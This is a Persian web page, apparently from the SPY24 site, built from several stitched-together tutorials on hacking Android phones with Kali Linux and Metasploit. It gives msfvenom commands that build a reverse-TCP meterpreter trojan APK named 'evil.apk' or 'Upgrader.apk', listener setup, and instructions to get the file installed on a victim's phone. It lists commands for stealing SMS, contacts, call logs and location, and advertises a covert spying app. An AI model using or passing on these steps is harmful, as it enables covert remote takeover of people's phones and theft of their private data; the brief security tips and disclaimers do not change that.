هک اندروید OS با استفاده از کالی لینوکس و راه های امنیت
هک اندروید با استفاده از کالی لینوکس و راه های امنیت در این اموزش به نحوه هک اندروید با استفاده از کالی لینوکس میپردازیم و روش های امنیت در مقابل این روش را اموزش میدهیم در این اموزش هک و امنیت با SPY24 همراه باشید.
هک اندروید و امنیت
بررسی شنود گوشی موبایل و معرفی نرم افزار شنود گوشی
توضیحات درباره هک اندروید
سیستم عامل اندروید یکی از OS های محبوب در کل دنیا است که روزانه افراد بسیاری از ان استفاده میکنند این OS برای دستگاه های موبایل طراحی شده است اما امکان نصب ان در هر سیستمی وجود دارد به همین دلیل محبوبیت بسیاری دارد و افراد زیادی در ایران و دنیا از ان استفاده میکنند.
در این اموزش با روش های تست نفوذ اندروید از طریق کالی لینوکس و فریمورک متاسپلویت اشنا میشویم و به طور کامل با آن کار خواهیم کرد.
متاسپلویت
متاسپلویت یک فریمورک قدرتمند تست نفوذ است که در اموزش متاسپلویت توضیحات کاملی را درباره ان خدمت شما عزیزان ارائه دادیم.
اما به طور خلاصه ابزاری است که در هر سیستم عاملی از جمله ویندوز قابل نصب است و به طور پیشفرض در کالی لینوکس وجود دارد.
و علت محبوبیت بسیار زیاد ان بزرگ بودن ان و استفاده از اکسپلویت ها و پیلود متنوع درون خود است و ما در این اموزش با استفاده از یکی از پیلود های ان یک فایل برای تست امنیت یا هک و کنترل اندروید خواهیم ساخت و ان را اجرا میکنیم.
اموزش ویدیو ای هک اندروید و امنیت
اموزش تست نفوذ اندروید
در ابتدا با دستور زیر وارد متاسپلویت شوید بعد از کمی انتظار و باز شدن متا دستور زیر را برای تنظیم و ساخت apk وارد کنید حال تنظیمات مربوط به این پیلود را انجام دهید برای تنظیم ای پی دستور زیر را با ای پی خود وارد کنید و یک پورت را برای اتصال انتخاب کنید برای مثال ما پورت ۶۰۶۰ را استفاده میکنیم
حال برای ساخت فایل اصلی هک اندروید که باید در اندروید نصب شود دستور زیر را وارد کنید
دستور زیر را برای ایجاد اتصال بین پیلود وارد کنید
و پیلود ساخته شده را ست نمایید ادرس پیلود در واقع ادرسی است که در دستور اول وارد کرده ایم
مجدد تنظیمات ای پی و پورت را مانند قبل انجام دهید دقت داشته باشید که تفاوتی بین ان ها نباشد مک ادرس سیستم خود را دستی تغییر دهید و در اخر برای اجرای کافیست دستور exploit را وارد کنید و تا نصب اپ اندروید ساخته شده منتظر بمانید.
بعد از نصب سریعا و اجرا برنامه اتصال برقرار خواهد شد و دسترسی meterpreter به شما اده خواهد شد و میتوانید دستورات خود را در سیستم عامل اندروید قربانی اجرا کنید یا از امکانات متاسپلویت برای ان استفاده کنید.
در صورتی که اندروید هدف روت شده باشد یعنی به بالا ترین سطح دسترسی رسیده باشد شما هم این دسترسی را خواهید داشت
و اطلاعات حساس و هسته اندروید دسترسی خواهید داشت که امکانات بسیار زیادی را در اختیار شما خواهد گزاشت
آموزش امنیت و جلوگیری از هک اندروید
- برای امنیت در سیستم عامل اندروید روش های بسیاری وجود دارد
- از انتی ویروس های اورجینال اندرویدی استفاده کنید
- از نصب برنامه های نامعتبر و کرک شده خود داری کنید
- از دریافت برنامه به غیر از پلی استور خود داری کنید
- بر روی هر ینکی کلیک نکنید و وارد وبسایت های نامعتبر نشوید
- از انتی ویروس های فعال استفاده کنید که با نصب هر برنامه ان را اسکن کند
- دیتا های اصلی خود را در موبایل نگه داری نکنید تا درصورت هک اندروید نگرانی زیادی نداشته باشید
- پسورد مناسب قرار دهید تا درصورت در دسترس قرار گرفتن فیزیکی موبایل مورد نفوذ قرار نگیرد
امید واریم از این اموزش هک اندروید و امنیت لذت برده باشید
چناتنچه سوال یا پیشنهادی دارید از بخش نظرات در اخر همین صفحه ارسال کنید و در کوتا ترین زمان پاسخ داده خواهد شد dymerge و ادغام پسورد لیست ها پایدار باشید.
مروز من یک ترفند کمی خطرناک برای هک کردن تلفن اندروید با استفاده از Kali Linux برای شما آماده کرده ام. با استفاده از ابزارهای Kali Linux می توانیم یک دستگاه اندرویدی را از راه دور کنترل کنیم. اما تلفن باید دارای یک اتصال اینترنتی فعال باشد.
تلفن های اندرویدی بسیار عجیب به نظر می رسند ، امروزه گوشی های اندرویدی سهم قابل توجهی در بازار تلفن های هوشمند دارند. بنابراین هدف قرار دادن تلفن اندرویدی گزینه بسیار خوبی برای هکرها می باشد ، ما در مقالات گذشته سایت در مورد افزایش امنیت و جلوگیری از هک شدن در موبایل و رایانه مقالات زیادی را نوشته ایم ، ولی در این آموزش قصد داریم شیوه نفوذ به گوشی های اندرویدی را بصورت راه دور توسط کالی لینوکس بیان کنیم.
نحوه هک کردن تلفن های اندروید با استفاده از Kali Linux
قبل از رفتن به آموزش هک کردن اندروید ، توجه داشته باشید که این روش ها تنها در سیستم عامل Kali Linux کار خواهند کرد.
هشدار : منظور از این هک آگاه سازی شما می باشد و این ترفند را فقط برای اهداف آموزشی بیاموزید. و سعی نکنید فعالیت غیرقانونی انجام دهید.
درباره Kali Linux ؟
Kali Linux ” کالی لینوکس یک توزیع لینوکس تخصصی در زمینه امنیت و تست نفوذ که برای اهدف نفوذ طراحی شده است .” بسیاری از کارکردها در Kali Linux مانند تست نفوذ و Ethical Hacking Linux و غیره وجود دارد.
چیزهایی که شما نیاز دارید
- دسک تاپ یا لپ تاپ در حال اجرا بر روی Kali Linux. اگر PC Windows دارید ، باید از VMWare استفاده کنید و Kali Linux را روی آن نصب کنید.
- یک اتصال اینترنتی فعال
- یک دستگاه Android برای انجام عملی خود
اگر با موفقیت کار را کامل کنید ، می توانید کارهای زیر را در دستگاه خود انجام دهید.
- مخاطبین و سایر اطلاعات شخصی را کپی کنید
- برای کلیک روی یک تصویر از دوربین استفاده کنید.
- پخش مستقیم صدا با استفاده از میکروفون.
- تمام پیام ها را بخوانید
- جریان فیلم ها و دسترسی به همه پرونده ها.
توجه : در این آموزش من از Acer Laptop به عنوان Attacker PC که Kali linux در آن نصب شده است استفاده می کنم ، و Coolpad Note 3 تلفن اندرویدی به عنوان تلفن اندرویدی مورد نفوذ برای نشان دادن چگونگی عملکرد آن استفاده کرده ام.
مراحل : هک کردن تلفن های اندروید با استفاده از Kali Linux
کاری که ما می خواهیم انجام دهیم ایجاد برنامه استقرار توسط Kali Linux Metasploit است که باید آن را بر روی دستگاه اندرویدی قربانی نصب کنیم. بعد از نصب برنامه بر روی دستگاه Android ، قادر خواهید بود تلفن را از هر کجا کنترل کنید.
شماره 1 : ترمینال Kali را بر روی رایانه شخصی خود باز کنید.
- بیشتر بدانید : چگونه Kali Linux را در Android نصب کنید
شماره 2 : ما می خواهیم از ” MSFVENOM ” استفاده کنیم تا یک فایل apk مخرب را که بر روی گوشی اندرویدی نصب خواهیم کرد ایجاد کنیم.
شماره 3 : این دستورات داده شده را در ترمینال بچسبانید.
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.27.207 R > root/evil.apk
در صورتی که در اجرای دستور بالا به مشکل برخوردین ، می توانید از دستور زیر استفاده نمایید :
~# msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > evil.apk
شماره 4 : ” LHOST ” را به آدرس IP محلی خود تغییر داده و enter را فشار دهید.
برای دانستن آدرس IP خود می توانید از دستور ifconfig استفاده کنید (فرمان فقط در صورت اتصال به اینترنت کار خواهد کرد).
شماره 5 : اکنون پوشه root را باز کنید و evil.apk را fhdn برای قربانی ارسال کنید. در واقع به گونه ای باید این فایل را در گوشی فرد قربانی نصب کنید.
شماره 6 : یک ترمینال جدید را باز کرده و ” msfconsole ” را وارد کنید.
شماره 7 : پس از باز کردن کنسول Metasploit ، این دستورات زیر را تایپ کنید که برای ایجاد یک payload handler استفاده می شود که باعث ایجاد ارتباط بین قربانی و Kali PC می شود.
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set lhost 172.16.27.207 exploit
شماره 8 : LHOST را به آدرس IP محلی خود تغییر دهید. همچنین ، این پایانه را ببندید.
شماره 9 : بعد از نصب برنامه در تلفن ، خواهید دید که دستگاه در کنسول شما متصل شده است.
اکنون می توانید از دستگاه دلخواه خود استفاده کنید. برای شناخت دستورات بیشتر ، help را تایپ کنید.
شماره 11 : در کنسول Metasploit ، می توانید از دستورات مختلفی که در زیر آورده شده استفاده کنید تا انواع مختلفی از ترفندهای مربوط به تلفن قربانی را مانند گرفتن عکس ، عکس صفحه ، تماس های مکالمه ، گزارش های پیام کوتاه ، ارسال پیام کوتاه از آن استفاده کنید.
| دستور | توضیح |
| activity_start | فعالیت Android را از یک رشته Uri شروع کنید |
| check_root | بررسی کنید که آیا دستگاه روت شده است یا خیر |
| dump_calllog | با ورود به سیستم تماس بگیرید |
| dump_contacts | لیست مخاطبین را دریافت کنید |
| dump_sms | پیام های sms دریافت کنید |
| geolocate | موقعیت جغرافیایی را دریافت کنید |
| interval_collect | قابلیت های جمع آوری فاصله را مدیریت کنید |
| send_sms | پیام کوتاه را از گوشی هدف می فرستد |
| set_audio_mode | تنظیم حالت رینگر |
| sqlite_query | جستجوی یک پایگاه داده SQLite از ذخیره سازی |
| wlan_geolocate | با استفاده از WLAN اطلاعات طولانی مدت فعلی را دریافت کنید |
توجه داشته باشید:
* پایانه msfconsole را ببندید.
* این مقاله برای اهداف آموزشی است.
بنابراین در بالا ، همه چیز در مورد نحوه هک کردن گوشی اندروید با استفاده از Kali Linux به راحتی ارائه شده است . اگر هنوز با مشکلی روبرو هستید با من در تماس باشید و در بخش نظرات به من اطلاع دهید ، این پست را با دوستان خود به اشتراک بگذارید و در ارتباط باشید.
برنامه SPY24 :
که اولین مورد از قوانین سایت و مهمترین آن مقابله با هک میباشد و هر گونه سو استفاده و استفاده نادرست از آموزش ها و برنامه های وبسایت SPY24 بر عهده کاربر می باشد.
سامانه مراقبت از خانواده (SPY24) نام یک نرم افزار موبایل با نصب و فعالسازی بسیار ساده می باشد که به والدین امکان کنترل و مدیریت فعالیت فرزندان در شبکه های مجازی موبایلی را می دهد.
در زیر می توانید برخی از امکانات برنامه SPY24 را مشاهده نمایید:
- نظارت بر تماس ها و پیامک ها به همراه تاریخ و زمان
- گزارش پیام های تلگرام ، اینستاگرام ، واتس اپ و…
- موقعیت لحظه مستمر و مسیر های پیموده شده
- وب سایت های بازدید شده و برنامه های اجرا شده
- با قابلیت پنهان سازی ۱۰۰ درصد برنامه و مدیرت راه دور
- امکان مسدود سازی وب سایت ها، برنامه ها و مخاطبین از راه دور
در مورد دوره ی هک اندروید در کالی لینوکس بیشتر بدانیم :
گوشی اندروید بیشترین استفاده را در طول روز برای ما انسان ها است و همانطور که فایده هایی که به همراه دارد خطراتی هم دارد،
ما برای اینکه بتوانیم جلوگیری کنیم از هک اندروید نیازمند یه یک دانش خواست هستیم .
برنامه نویسان اندروید باید از این دوره اموزشی استفاده کنند و بیشترین سهم را در این دوره دارند چون پر اهمیت ترین خصوصیت یک اپلیکیشن امنیت ان است ، کاربران یک اپلیکیشن همیشه نگران اطلاعات شخصی خودشان هستند که نکند اطلاعات شخصی ان ها لو برود!!! در دوره ای که ما تهیه کره ایم هک اندروید از مبتدی تا پیشرفته است که امیدواریم استفاده کامل را ببرید.
هک چیست و هکر کیست؟
به کسی که سیستم عاملی را مورد نفوذ قرار داده است میگویند هکر و سیستم عاملی که مورد نفوذ قرار گرفته است را می گویند هک ، هکر ها انواع گوناگونی دارند که میتوانید از مطالب در سایت ما مشاهده کنید.
کالی لینوکس چیست؟
کالی لینوکس یک توزیع لینوکس مبتنی بر دبیان است که هدف آن تست نفوذ وامنیتی پیشرفته است. کالی شامل چند صد ابزار است که به کارهای مختلف امنیتی اطلاعات مانند تست نفوذ ، تحقیقات امنیتی و مهندسی معکوس اختصاص یافته است. کالی لینوکس توسط یک شرکت پیشرو آموزش امنیت اطلاعات ، توسعه یافته ، تأمین و پشتیبانی می شود.
کالی لینوکس در سیزدهم مارس 2013 به عنوان یک بازسازی کامل و از بالا به پایین از BackTrack Linux با رعایت کامل استانداردهای توسعه دبیان منتشر شد.
کالی لینوکس در اخرین ابدیت خود در سال 2019 ویژگی های زیادی را به سیستم عامل خود اضافه کرد که ما در یک ویدیو ان ها را بررسی کرده ایم.
آیا هک اندروید امکان دارد؟
صد در صد بدون شک در دنیایی که ما زندگی میکنیم موبایل بیشتر استفاده را دارد و صد در صد هم مورد هک قرار میگیرد.
تلفن های هوشمند تقریباً همیشه به اینترنت متصل هستند و این را میدانید که از طریق اینترنت میشود به همه چیز دسترسی پیدا کرد . و حالا ما باید یاد بگیریم که چطور خود را در این فضا امن نگهر داریم.
اندروید را با کالی لینوکس هک کنید
به سری آموزش های تست نفوذ آکادمی امنیت اطلاعات ایران خوش آمدید. در این مقاله قصد تست نفوذ به دستگاه اندرویدی را داریم که در محیط کالی بوسیله متااسپلویت انجام می شود. پس آماده باشید تا اندروید را با کالی لینوکس هک کنید…
هدف از این آموزش تمرین تست نفوذ و آشنایی با راه های نفوذ در اندروید است، به هیچ وجه برای اهداف شخصی و دسترسی به گوشی انجام ندهید. پیشنهاد ما این است که برای امور تست نفوذ اندروید یک لابراتوار کوچک و کم هزینه برای خود تهیه کنید.
هشدار
مرحله اول
کالی را راه اندازی کنید
وارد کالی لینوکس خود شوید و ترمینال را باز کنید تا مراحل ساخت یک فایل Trojan .apk برای نفوذ را پیش ببریم.
دستور زیر را در ترمینال بنویسید:
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk
LHOST را آدرس IP خود یا سرور برای برقراری ارتباط وارد کنید. در صورت استفاده از آدرس IP خود باید قابلیت Port forwarding را فعال کنید.
این روش نفوذ در تمام تجهیزات اندرویدی در محیط شبکه اینترنت یعنی WAN هم قابل اجرا است. پس بنشینید و آماده باشید تا اندروید را با کالی لینوکس هک کنید.دستورات وارد شده در ترمینال کالی لینوکس
مرحله دوم
ترمینال دیگری باز کنید
در حالی که صفحه ترمینال بالا باز است، ترمینال دیگری را باز کنید، و کنسول متااسپلویت را با دستور msfconsole اجرا کنید: نسول متااسپلویت
مرحله سوم
یک Listener برای دریافت اطلاعات تنطیم کنید
بعد از اینکه متااسپلویت لود شد دستور زیر را اجرا کنید
use exploit/multi/handler
در ادامه باید یک (reverse) payload تنظیم کنیم تا ارتباط بین هکر و قربانی برقرار شود، دستور زیر را تایپ کنید:
set payload android/meterpreter/reverse_tcp
برای تنظیم LHOST همان آدرسی که مرحله قبل تنظیم کردید و برای خودتان است را وارد کنید.
set LHOST 192.168.0.4
مرحله چهارم
اکسپلویت کنید
دستور exploit را تایپ کنید
سپس برای اینکه اندروید را با کالی لینوکس هک کنید باید فایل Upgrader.apk که برنامه متااسپلویت ساخته است را در تلفن اندروید خود اجرا کنید. این فایل در پوشه Root شما ساخته و ذخیره شده است.
نفوذ موفق
بعد از نصب و اجرا در سیستم اندروید میتوانید به وسیله کنسول متااسپلویت خود، کلیه کنترل اندروید را بدست بگیرید.
نکته: ممکن است این روش بر انواع مختلف اندروید های جدید که دارای برزورسانی و تقویت سیستم امنیتی و دارای برنامه امنیتی باشند بدرستی کار نکند.
اگر بیشتر در مورد متااسپلویت میخواهید بدانید، مقالات زیر را بخوانید:
متااسپلویت چیست؟ مقاله ای کامل در مورد متااسپلویت
سایت رسمی متااسپلویت
